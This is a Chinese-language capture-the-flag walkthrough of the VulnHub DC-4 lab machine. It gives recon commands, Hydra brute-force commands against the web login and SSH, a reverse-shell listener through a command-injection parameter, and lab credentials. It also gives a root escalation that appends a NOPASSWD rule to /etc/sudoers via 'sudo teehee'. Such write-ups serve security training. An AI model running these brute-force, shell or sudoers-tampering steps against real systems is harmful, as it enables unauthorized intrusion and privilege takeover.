0X01 環境部署
1.下載下傳位址
https://www.vulnhub.com/entry/dc-4,313/
安裝好并将網絡置為NET模式
kali net模式
DC-4 net模式
0X02 資訊收集
1.主機發現
arpscan -l
1. kali 192.168.190.128
2. 目标機 192.168.190.132
2.目錄掃描
python3 dirsearch.py -u http://192.168.190.132/
3.檢視網站配置
4.端口收集
nmap -sS 192.168.190.132
發現存在80端口,可以進行檢視
admin多半是賬戶名,進行爆破,本次利用kali自帶的爆破軟體hydra,爆破字典也是kali自帶
位置在/usr/share/wordlists/rockyou.txt.gz
hydra -l admin -P rockyou.txt 192.168.190.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
賬号:admin
密碼:happy
抓取網絡資料包,發現是指令執行
接收指令的參數就是radio
嘗試修改radio後面參數,例whoami,檢視目前權限
0X03 Getshell
進行反彈shell
kali開啟監聽 nc -lvnp 5678
利用可以進行執行指令, 進行反彈shell
進行互動式的:python -c 'import pty;pty.spawn("/bin/bash")'
切換到home 加目錄下進行檢視
cd /home
ls la
發現有三個使用者,切換到jim目錄下進行檢視
cd jim
ls -la
到jim使用者下的目錄進行檢視是否有可以利用的資訊
cat test.sh
檢視其他目錄
cd /backups
ls
cat old-passwords.bak
将查到的密碼進行儲存
vim mm.txt
由于剛剛檢視端口資訊時,發現了22端口,可以利用hydra再次進行爆破
hydra -l jim -P mm.txt -I -t 64 ssh://192.168.190.132:22
jim/jibril04
嘗試進行登入
ssh [email protected]
0X04 提權
1.目前權限
whoami
嘗試sudo 是否可以提權
sudo -l
檢視有什麼其他的檔案
ls
cat mbox
發現是一份郵件,進行一個檢視
cd /var/mail
cat jim
是一份charles寫給jim的信,有charles的密碼
charles/ ^xHhA&hvim0y
切換到charles使用者下檢視其檔案是否可以進行提權
su charles
cd /home/charles
ls -la
繼續利用sudo提權嘗試
sudo -l
2.開始提權
tee-從标準輸入讀取并寫入标準輸出和檔案
由于我們沒有sudo權限,也就沒有辦法切換成root使用者,但是teehee或許可以幫助進行提權成功,輸入此代碼:
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
這句話的意思是将charles這個使用者賦予執行sudo的權限添加到/etc/sudoers裡。
| 是管道符 将前面的輸出添加到後面
sudo teehee -a 是用管理者權限使用teehee -a指令
teehee -a 是添加一條語句到 /etc/sudoers裡
/etc/sudoers 裡存着的使用者都有執行sudo的權限。
sudo su
whoami
ls -la
cat flag.txt
0X05 總結
1.首先收集資訊,真實ip,端口,網站目錄,網站部署部件等
2.根據開放端口進行測試
3.利用80端口配合指令執行,getshell
4.利用使用者之間的關系進行測試
5.檢視權限,利用sudo進行提權
6.提權成功檢視flag